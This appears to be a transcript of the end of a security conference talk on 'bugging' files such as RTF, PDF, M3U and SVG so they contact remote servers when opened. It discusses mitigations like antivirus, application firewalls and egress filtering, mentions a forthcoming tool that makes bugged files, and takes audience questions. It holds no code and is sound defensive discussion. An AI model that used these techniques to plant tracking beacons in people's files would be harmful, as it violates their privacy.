The first and perhaps most obvious is antivirus. All of the techniques that we're using have fairly standard signatures. So if I bug an RTF file, it is possible for a program to analyze that RTF file and tell that it's been bugged. Unfortunately, there are so many formats that this is possible for; we really only scratched the surface. There is no way that AV can reliably cover every format that has the ability to be bugged. Additionally, some of the techniques that we've used have legitimate use cases. There may be a legitimate reason to embed a remote image in a PDF, or, for instance, a playlist file: there are legitimate reasons for a playlist file to have remote file URLs in it. Otherwise it would be kind of a boring playlist, I guess. So both of these issues are things that prevent AV from being an effective mitigation.

Let's talk about format changes.
So for some of these formats, there are not necessarily legitimate use cases for opening these types of URLs, so we'll just change the format to prevent that. Unfortunately, time and time again in our industry it's been proven that that's just not possible. You have to maintain a certain level of backwards compatibility. There are too many people using these formats, too many people using these parsers, and too many files that have been created with older versions for us to be able to change the format. There's just too much inertia behind how these things are already designed.

Finally, in my opinion, the best mitigation that we've come up with yet: application-level firewalls. These are things like, on Windows, ZoneAlarm, or on OS X, Little Snitch, or on Linux, is it Lotus Flower? Leopard Flower? Leopard Flower. So what these do is, every time an application attempts to initiate a connection, this firewall will notify you and say, "Hey, your PDF reader is trying to connect to attacker.com. Do you want to allow this?" This is a pretty good mitigation for the vast majority of file formats. For instance, it will never be the case that I want WordPad to connect to a remote server, so I can say deny, deny, deny if my WordPad is trying to connect to a remote server. However, for playlist formats like M3U, that's kind of the whole point, is that they connect to remote servers. So you can't reliably say an application firewall fixes everything and is a panacea.

Yeah, the reason that we're talking about all these different mitigations and how they do or don't work to various degrees is because, honestly, we don't have a good solution for this.
We don't have a fix. We're just trying to, like, put more fuel on the fire.

So another thing we thought about is warnings. Obviously there's some use to warnings, and some people will click through, but you'll at least be putting more information in the hands of the user. Obviously people click through warnings a lot of the time, so this is not necessarily helpful at all, but it might at least get you to stop and say, "Oh, well, hold on. Maybe this is not something I want to do." So you're at least putting more power in the hands of the user.

You could also do something to just shut off networking capabilities for particular programs in general. For instance, Damon made the example that with WordPad, I personally, and Damon apparently personally, don't want WordPad to ever communicate with the internet, except maybe if it has to communicate to software update dot microsoft.com, but that's done through the OS. So just never, never at all. So for something like that it's easy, but it has the same problems as application-level firewalls. The other thing is, attempting to hook network calls in some programs is a lot cleaner than in others. Certain things, proxychains, will just completely break because, uh, it was Chrome: Chrome disables the LD_PRELOAD directive, so you can't use proxychains against Chrome, at least the last time I tried it.

There's also egress filtering. This is a good
partial solution, and this will at least prevent things like outbound SMB traffic leaving your organization or your home. This is something that's a good idea in general, doing egress filtering. But again, you still need to let some things through. So you might be letting web traffic through, and that's the way that a lot of the privacy-violating tracking stuff, we were able to do that.

So you think this stuff is cool and you want to play with it yourself and get your hands dirty. We have exactly what you want. We have created a tool that accepts as input all of the various formats that we support and will produce as output a bugged version of that same file. It's still a work in progress. It's like version zero zero zero negative one alpha. Additionally, it's not yet on GitHub, because we have been really drunk this entire week and we haven't had good internet connectivity. So it will be on GitHub within the next one to two weeks, if you want to download this thing and start bugging your own files.

So at this point we're going to open it up for questions.

Okay, time for some questions. Anybody? Over there on the mic, I see someone.

Hi, great talk. Did you guys find any issues with default file handlers? So when Windows gives a preview, or when OS X gives a preview of the files, did you find that would also initiate connections to wherever?

So the question is, did default file handling rules prove to be any effective measure against this, or did they get in our way of doing this sort of thing? Am I understanding you right? Either or, really?

When you click on a file but don't open the file, in Windows Explorer for example, you can have it preview the file without actually opening a full version of Word or whatever.

So are you asking if the preview is also vulnerable to this sort of thing?
Yeah. That's not something we've tested. I can imagine for certain vectors, I could certainly postulate, like SVG files, it would be very likely that that would be vulnerable, because you can't properly display the image without downloading the style sheets. So I would say it probably varies by format, and I would say we can't say authoritatively whether or not that's the case.

Yeah, we can say with some certainty that some of them are likely to work even with preview. So anything that you have to visually render, probably it will work. Anything like a video file where, five seconds in, it launches a URL, that's almost certainly not going to work. I can say pretty certainly that that's not going to work. But as previously stated, we haven't tested it, so we can't say for sure. Try it out on your own once we get the tool online.

I will, thanks. Cheers.

Any other questions? Or did we just cover it so well that nobody has any uncertainty left in their hearts? I guess so.

Yes, let's bring it back one slide to the GitHub URL. Go ahead and copy it down. We super duper dark promise that it will be there in one to two weeks. We have a somewhat working version on our laptops, but we have not yet found the person within NCC Group that knows how to put things in this URL. But we will find that person in one to two weeks and then it will be there.

All right, thank you Damon, Daniel. Thank you. Thank you all for listening.